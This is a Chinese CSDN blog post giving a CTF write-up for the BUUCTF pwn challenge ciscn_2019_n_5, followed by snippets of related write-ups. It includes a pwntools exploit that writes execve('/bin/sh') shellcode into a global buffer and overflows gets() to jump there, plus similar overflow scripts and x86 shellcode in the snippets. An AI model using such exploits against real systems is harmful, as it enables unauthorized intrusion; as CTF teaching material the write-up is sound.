BUUCTF-ciscn_2019_n_51

最新推荐文章于 2025-02-15 13:30:44 发布
最新推荐文章于 2025-02-15 13:30:44 发布
阅读量426 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/127217446
版权

0x1 checksec

没有开启保护,有可写segments,考虑shellcode

0x2 IDA 

1.main

gets()函数溢出点

 

偏移量

栈溢出到shellcode,getshell 

0x3 EXP

from pwn import *
context.log_level="debug"
p=remote("node4.buuoj.cn",29553)

context.arch="amd64"
shellcode=asm(shellcraft.sh())

name=0x601080
p.recvuntil("name\n")

p.sendline(shellcode)

p.recvuntil("?\n")
payload="A"*0x28+p64(name)

p.sendline(payload)


p.interactive()

[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 917
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 480
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
BUUCTF-ciscn_2019_ne_51
Rt1Text的博客
10-09 360
根据文件名可知是other shellcode。
[BUUCTF]PWN5——ciscn_2019_n_1
mcmuyanga的博客
08-25 2207
[BUUCTF]4——ciscn_2019_n_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_1 步骤: 例行检查,64位,开启了nx保护 nc一下看看输入点的字符串,看运行结果猜测是一个猜数的程序,而且需要我们猜的数应该是11.28125 输入11.28125,发现还是不对 用64位ida打开,首先shift+f12查看程序里的字符串,发现了 “ cat /flag ” 双击跟进,ctrl+x找到调用这个字符串的函数 我们可以看到第10行的if
buuctf ciscn_2019_n_5
qq_53912227的博客
02-15 214
发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限。shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了。发现NX unknown(想到了ret2shellcode)这个时候就可以确定ret2shellcode不行。开局:典型的ret2libc,老规矩,file 文件。
BUUCTF ciscn_2019_n_5
2401_88087539的博客
01-14 371
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3293
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 674
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1134
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4705
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
BUUCTFciscn_2019_n_5 Write Up
古月浪子的博客
08-06 557
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上 什么保护都没开,我们发现可以直接执行bss段上的代码 思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell 注意栈帧大小 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64'.
ciscn_2019_n_5
、moddemod
06-17 355
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 1038
[buuctf]ciscn_2019_n_5
【CTF】ciscn_2019_n_5
凉水的博客
04-22 1067
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
pwn 2
2303_80471032的博客
02-03 405
1.checksec查看文件保护64位,基本没有保护2.将文件放入ida,f5查看反编译的代码找到name地址3.gdb查一下bss段的权限,可执行,可将shellcode注入name段4.计算偏移量5.写脚本6.运行得到flag。
BUUCTF-pwn-ciscn_2019_ne_51
qq_30528603的博客
11-29 196
我们看到strcpy是将src的内容复制到dest。我们前面看到src允许我们输入128个字节。而dest数组离ebp只有0x48个字节。32为程序没有canary没有PIE,应该是简单的栈溢出。程序上来是输入一个密码验证。随便输入下错误直接退出。那么我们需要构造的东西都有了,接着就是找溢出点。它会把我们的输入放入src这个数组中。主函数大致流程在此。当找不到/bin/sh的时候,可以用sh代替。这里就有一个小技巧了。
BUUCTF-others_shellcode
最新发布
03-26
### BUUCTF Others Shellcode 题目解题思路 BUUCTF中的`Others_Shellcode`是一道典型的PWN类题目,主要考察选手对于Shellcode编写以及Linux环境下的漏洞利用能力。以下是关于该题目的核心解题思路: #### 一、题目背景与目标 此题目提供了一个可执行程序文件,其功能是读取用户输入并尝试运行特定指令。然而,由于存在某些安全机制未启用(如NX位关闭),攻击者可以注入自定义的Shellcode来实现任意命令执行。 通过分析可知,目标是要构造一段能够绕过现有防护措施的有效载荷(shellcode),最终达到获取flag的目的[^1]。 #### 二、具体技术细节解析 1. **逆向工程** 使用工具如Ghidra或者Radare2对给定二进制文件进行静态反汇编分析,确认入口点函数逻辑及其调用链路情况;同时也要注意查看是否有其他隐藏的功能模块被触发的可能性。 2. **确定ROP Gadget** 如果发现保护机制开启了部分控制流完整性验证,则可能需要用到Return-Oriented Programming (ROP) 技巧构建新的执行流程路径。这一步骤涉及查找合适的gadgets组合形成所需的系统调用序列。 3. **编写Shellcode** 基于上述准备好的信息,按照实际需求定制化设计payload内容。考虑到不同架构下寄存器分配规则差异等因素,在撰写过程中需格外小心处理字节顺序等问题以免引起错误行为发生。 4. **测试与调试** 利用QEMU模拟真实机器环境下多次试验调整直至成功完成挑战为止。期间还可以借助strace跟踪进程活动状况以便更好地理解整个交互过程的工作原理。 ```python from pwn import * context.arch = 'i386' shellcode = asm(''' xor eax, eax # 清零EAX 寄存器 push eax # 将 NULL 推入堆栈作为字符串终止符 # 此处创建 "/bin/sh\x00" 的一部分 push 0x68732f6e # hs/n push 0x69622f2f # ib// mov ebx, esp # EBX -> 参数1: 文件名指针 ("//bin/sh") cdq # EDX <- EAX 扩展成双字长形式 (清零EDX) # DX 是第二个参数,这里不需要设置任何东西 mov ecx, edx # ECX <- 第三个参数也是NULL mov al, 0xb # AL 设置为syscall编号 execve() int 0x80 # 发起中断请求操作系统服务 ''') p = process('./vuln') p.sendline(shellcode) log.success(f'Shellcode Sent! Waiting for shell...') p.interactive() ``` 以上脚本展示了如何生成适用于Intel x86体系结构的一个简单execve("/bin/sh", ...) 调用样例,并发送至服务器端等待响应。 --- ###
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值